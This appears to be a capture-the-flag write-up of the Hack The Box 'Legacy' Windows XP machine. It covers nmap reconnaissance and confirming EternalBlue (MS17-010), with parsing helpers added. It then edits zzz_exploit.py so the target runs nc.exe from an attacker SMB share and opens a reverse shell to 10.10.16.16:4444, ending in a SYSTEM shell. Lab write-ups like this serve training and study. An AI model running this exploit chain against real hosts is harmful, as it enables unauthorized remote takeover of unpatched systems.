Legacy

Skills

  • SMB Enumeration
  • Eternalblue Exploitation (MS17-010) [Triple Z Exploit]

Certifications

  • eJPT
  • OSCP

Description

Legacy is an easy Windows machine. We gain access as the Administrator user by exploiting MS17-010, better known as EternalBlue.


Reconnaissance

We check that the host is up and get a first hint of its operating system from the TTL. Windows hosts normally reply with a TTL of 128; here the replies arrive with 127 because an intermediate hop decremented it by one.

# ping 10.129.97.63    
PING 10.129.97.63 (10.129.97.63) 56(84) bytes of data.
64 bytes from 10.129.97.63: icmp_seq=1 ttl=127 time=60.7 ms
64 bytes from 10.129.97.63: icmp_seq=2 ttl=127 time=62.1 ms
^C
--- 10.129.97.63 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 60.688/61.378/62.068/0.690 ms
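As an added example (not part of the original write-up), the following Python snippet encodes that TTL rule of thumb: it pulls the TTL out of the ping replies (the sample lines are constructed to match the output above) and maps it to the nearest default initial TTL to estimate the OS family and the number of hops in between. Treat the result as a hint, not a fingerprint: a host can change its default TTL, and a value like 65 is ambiguous between "Linux, one hop" and "Windows, 63 hops".

```python
# Added example (not from the original write-up): infer the likely OS family
# and hop count from the TTL seen in ping replies.  The initial-TTL table is
# the usual heuristic (Linux/Unix 64, Windows 128, network gear/Solaris 255);
# it is an assumption about defaults, not proof of the OS.
import re

INITIAL_TTLS = {64: "Linux/Unix", 128: "Windows", 255: "Network device/Solaris"}

# Constructed sample: the reply lines from the ping above.
SAMPLE_PING = """\
64 bytes from 10.129.97.63: icmp_seq=1 ttl=127 time=60.7 ms
64 bytes from 10.129.97.63: icmp_seq=2 ttl=127 time=62.1 ms
"""

_TTL_RE = re.compile(r"\bttl=(\d+)")


def observed_ttls(ping_output):
    """Return every TTL value found in ping reply lines, in order."""
    return [int(m) for m in _TTL_RE.findall(ping_output)]


def guess_os(ttl):
    """Map an observed TTL to (os_family, hops).

    Each router decrements the TTL by one, so the sender's initial value is
    the smallest default initial TTL that is >= the observed one; the
    difference is the estimated number of hops.
    """
    if not 1 <= ttl <= 255:
        raise ValueError("TTL must be in 1..255")
    for initial in sorted(INITIAL_TTLS):
        if ttl <= initial:
            return INITIAL_TTLS[initial], initial - ttl
    raise AssertionError("unreachable: 255 covers every valid TTL")


def fingerprint(ping_output):
    """Parse ping output and return (os_family, hops).

    Refuses to guess when replies disagree (e.g. a load balancer with mixed
    backends) or when no TTL is present at all.
    """
    ttls = set(observed_ttls(ping_output))
    if len(ttls) != 1:
        raise ValueError(f"inconsistent or missing TTLs: {sorted(ttls)}")
    return guess_os(ttls.pop())


if __name__ == "__main__":
    family, hops = fingerprint(SAMPLE_PING)
    print(f"{family}, about {hops} hop(s) away")
```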

Nmap

We scan the full TCP port range with nmap, reporting only open ports and saving greppable output to openPorts so the port list can be reused in the next scan.

# sudo nmap -p- --open --min-rate 5000 -sS -Pn -n -v 10.129.97.63 -oG openPorts 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 14:37 CEST
Initiating SYN Stealth Scan at 14:37
Scanning 10.129.97.63 [65535 ports]
Discovered open port 139/tcp on 10.129.97.63
Discovered open port 445/tcp on 10.129.97.63
Discovered open port 135/tcp on 10.129.97.63
Completed SYN Stealth Scan at 14:37, 14.53s elapsed (65535 total ports)
Nmap scan report for 10.129.97.63
Host is up (0.074s latency).
Not shown: 64202 closed tcp ports (reset), 1330 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 14.61 seconds
           Raw packets sent: 72026 (3.169MB) | Rcvd: 65733 (2.629MB)
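The openPorts file written by -oG above is what the service scan that follows is built from. As an added example (not from the original post), here is a small parser for nmap's greppable format that extracts the open ports per host and produces the comma-separated value handed to -p; the sample file content is constructed to match the scan above.

```python
# Added example (not from the original post): parse nmap -oG output and
# build the "-p" argument for the follow-up service scan.
# Greppable format: "Host: <ip> (<name>)\tPorts: <port>/<state>/<proto>/<owner>/<service>/<rpc>/<version>/, ..."

# Constructed sample: what openPorts should contain for the scan above.
SAMPLE_GNMAP = """\
# Nmap 7.94SVN scan initiated Mon Jul 22 14:37:01 2024 as: nmap -p- --open --min-rate 5000 -sS -Pn -n -v 10.129.97.63 -oG openPorts
Host: 10.129.97.63 ()\tStatus: Up
Host: 10.129.97.63 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\tIgnored State: closed (64202)
# Nmap done at Mon Jul 22 14:37:16 2024 -- 1 IP address (1 host up) scanned in 14.61 seconds
"""


def parse_gnmap(text):
    """Return {ip: [(port, proto, state, service), ...]} from -oG output."""
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comments and blank lines
        fields = line.split("\t")
        ip = fields[0].split()[1]
        results.setdefault(ip, [])
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue  # "Status: Up" lines carry no port data
            for entry in field[len("Ports:"):].split(","):
                parts = entry.strip().split("/")
                if len(parts) < 5:
                    continue  # malformed entry; skip rather than crash
                port, state, proto, _owner, service = parts[:5]
                results[ip].append((int(port), proto, state, service))
    return results


def open_ports(text, ip=None, proto="tcp"):
    """Sorted, de-duplicated open ports for one host (or all hosts)."""
    parsed = parse_gnmap(text)
    hosts = [ip] if ip else list(parsed)
    ports = {
        port
        for host in hosts
        for port, p, state, _svc in parsed.get(host, [])
        if p == proto and state == "open"
    }
    return sorted(ports)


def nmap_port_arg(ports):
    """Render a port list as the value nmap expects after -p."""
    return ",".join(str(p) for p in ports)


if __name__ == "__main__":
    ports = open_ports(SAMPLE_GNMAP)
    print(f"nmap -sCV -p {nmap_port_arg(ports)} 10.129.97.63 -oN services")
```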

Next we run service and version detection, plus the default scripts, against the open ports we found.

# nmap -sCV -p 135,139,445 10.129.97.63 -oN services                                     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 14:38 CEST
Nmap scan report for 10.129.97.63
Host is up (0.11s latency).

PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2024-07-27T17:35:57+03:00
|_nbstat: NetBIOS name: nil, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:4f:f8 (VMware)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 5d00h27m39s, deviation: 2h07m16s, median: 4d22h57m39s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.78 seconds

SMB Enumeration

The target is Windows XP with SMB exposed, so we check for known SMB vulnerabilities with nmap's vuln scripts, restricted to the safe category so the check itself does not crash the service.

# nmap --script "vuln and safe" -p 445 10.129.97.63 -oN smbScan 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 01:08 CEST
Nmap scan report for 10.129.97.63
Host is up (0.065s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds     

SMB Exploitation

Since the host is vulnerable to EternalBlue (MS17-010) we can gain access as Administrator. Besides the nmap script, checker.py from https://github.com/worawit/MS17-010 can confirm the vulnerability. The script is old and written for Python 2, so I create a PyCharm project with a Conda environment running Python 2.7 and install Impacket 0.9.19, an old release that still runs on Python 2 and exposes the API the script was written against. Then clone the repository, change into it, and run checker.py from the PyCharm console. Note that from here on the target address is 10.129.227.181 rather than 10.129.97.63.

# python2 checker.py 10.129.227.181
Target OS: Windows 5.1
The target is not patched

=== Testing named pipes ===
spoolss: Ok (32 bit)
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: Ok (32 bit)
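Added example (not part of the original post or of the MS17-010 repository): a parser for checker.py's output that records the OS string, the patch state and which named pipes accepted the probe. zzz_exploit.py takes a pipe name as its second argument, so choosing one that checker reported as Ok (and noting the reported architecture) is the decision the next step depends on. The sample output is constructed to match the run above; the "The target is patched" string for the non-vulnerable case is an assumption, since only the unpatched message appears on this page.

```python
# Added example (not from the original post or the worawit/MS17-010 code):
# parse checker.py output and pick a named pipe for zzz_exploit.py.
import re

# Constructed sample: the checker.py run shown above.
SAMPLE_CHECKER = """\
Target OS: Windows 5.1
The target is not patched

=== Testing named pipes ===
spoolss: Ok (32 bit)
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: Ok (32 bit)
"""

_PIPE_RE = re.compile(r"^(\w+):\s+(.+?)\s*$")
_OK_RE = re.compile(r"^Ok \((\d+) bit\)$")


def parse_checker(text):
    """Return {'os': str, 'patched': bool|None, 'pipes': {name: {...}}}.

    'patched' stays None if neither patch message is seen.  The patched
    message text is assumed; only the unpatched one appears on this page.
    """
    result = {"os": None, "patched": None, "pipes": {}}
    in_pipes = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Target OS:"):
            result["os"] = line.split(":", 1)[1].strip()
        elif line == "The target is not patched":
            result["patched"] = False
        elif line == "The target is patched":  # assumed wording
            result["patched"] = True
        elif line == "=== Testing named pipes ===":
            in_pipes = True
        elif in_pipes and line:
            m = _PIPE_RE.match(line)
            if not m:
                continue
            name, status = m.groups()
            ok = _OK_RE.match(status)
            result["pipes"][name] = {
                "ok": ok is not None,
                "arch": int(ok.group(1)) if ok else None,  # 32 or 64
                "status": status,  # e.g. STATUS_ACCESS_DENIED
            }
    return result


def usable_pipes(parsed):
    """Names of pipes the checker could open, in the order reported."""
    return [name for name, p in parsed["pipes"].items() if p["ok"]]


def choose_pipe(parsed, preferred=("browser", "spoolss", "lsarpc", "samr", "netlogon")):
    """Pick the pipe to hand to zzz_exploit.py, or None if nothing is usable.

    The preference order is just a convention for this example; any pipe
    reported Ok works.  Refuse to choose when the target is patched.
    """
    if parsed["patched"] is not False:
        return None
    usable = usable_pipes(parsed)
    for name in preferred:
        if name in usable:
            return name
    return usable[0] if usable else None


if __name__ == "__main__":
    info = parse_checker(SAMPLE_CHECKER)
    pipe = choose_pipe(info)
    print(f"{info['os']}: patched={info['patched']} usable={usable_pipes(info)}")
    print(f"python2 zzz_exploit.py 10.129.227.181 {pipe}")
```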

It is indeed vulnerable. To get remote command execution we edit the smb_pwn() function in zzz_exploit.py: its default body only creates c:\pwned.txt on the target, so we replace it with a service_exec() call that runs a ping back to our machine (10.10.16.16) as a quick proof of execution.

def smb_pwn(conn, arch):
        #smbConn = conn.get_smbconnection()
          
        #print('creating file c:\\pwned.txt on the target')
        #tid2 = smbConn.connectTree('C$')
        #fid2 = smbConn.createFile(tid2, '/pwned.txt')
        #smbConn.closeFile(tid2, fid2)
        #smbConn.disconnectTree(tid2)
        
        #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
        service_exec(conn, r'cmd /c ping 10.10.16.16')
        # Note: there are many methods to get shell over SMB admin session
        # a simple method to get shell (but easily to be detected by AV) is
        # executing binary generated by "msfvenom -f exe-service ..."

Now run the script, passing the target and the named pipe to use. browser is one of the pipes checker.py reported as Ok.

# python2 zzz_exploit.py 10.129.227.181 browser

On our machine we see the ICMP echo requests arriving from the target, which confirms code execution:

# sudo tcpdump -i tun0 icmp
[sudo] password for justice-reaper: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
16:05:02.159309 IP 10.129.227.181 > 10.10.16.16: ICMP echo request, id 512, seq 256, length 40
16:05:02.163609 IP 10.10.16.16 > 10.129.227.181: ICMP echo reply, id 512, seq 256, length 40
16:05:03.171402 IP 10.129.227.181 > 10.10.16.16: ICMP echo request, id 512, seq 512, length 40
16:05:03.171475 IP 10.10.16.16 > 10.129.227.181: ICMP echo reply, id 512, seq 512, length 40
16:05:04.171822 IP 10.129.227.181 > 10.10.16.16: ICMP echo request, id 512, seq 768, length 40
16:05:04.171843 IP 10.10.16.16 > 10.129.227.181: ICMP echo reply, id 512, seq 768, length 40

Copy nc.exe into the current directory and serve it with impacket-smbserver so the target can run it from a UNC path. The -smb2support flag is harmless here: Windows XP only speaks SMB1, and the server still accepts SMB1 clients.

# cp /usr/share/windows-resources/binaries/nc.exe .
# impacket-smbserver smbFolder $(pwd) -smb2support

Start a netcat listener on port 4444:

# nc -nlvp 4444

Edit smb_pwn() in zzz_exploit.py again, this time launching nc.exe straight from our SMB share via its UNC path and pointing it at the listener:

def smb_pwn(conn, arch):
	#smbConn = conn.get_smbconnection()
	
	#print('creating file c:\\pwned.txt on the target')
	#tid2 = smbConn.connectTree('C$')
	#fid2 = smbConn.createFile(tid2, '/pwned.txt')
	#smbConn.closeFile(tid2, fid2)
	#smbConn.disconnectTree(tid2)
	
	#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
	service_exec(conn, r'cmd /c \\10.10.16.16\smbFolder\nc.exe -e cmd 10.10.16.16 4444')
	# Note: there are many methods to get shell over SMB admin session
	# a simple method to get shell (but easily to be detected by AV) is
	# executing binary generated by "msfvenom -f exe-service ..."

Run the exploit again:

# python2 zzz_exploit.py 10.129.227.181 browser

We get a shell back. service_exec() starts the command as a Windows service through the Service Control Manager, so the shell runs as the LocalSystem account, which has full Administrator-level control of the box:

# nc -nlvp 4444      
listening on [any] 4444 ...
connect to [10.10.16.16] from (UNKNOWN) [10.129.227.181] 1041
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
This post is licensed under CC BY 4.0 by the author.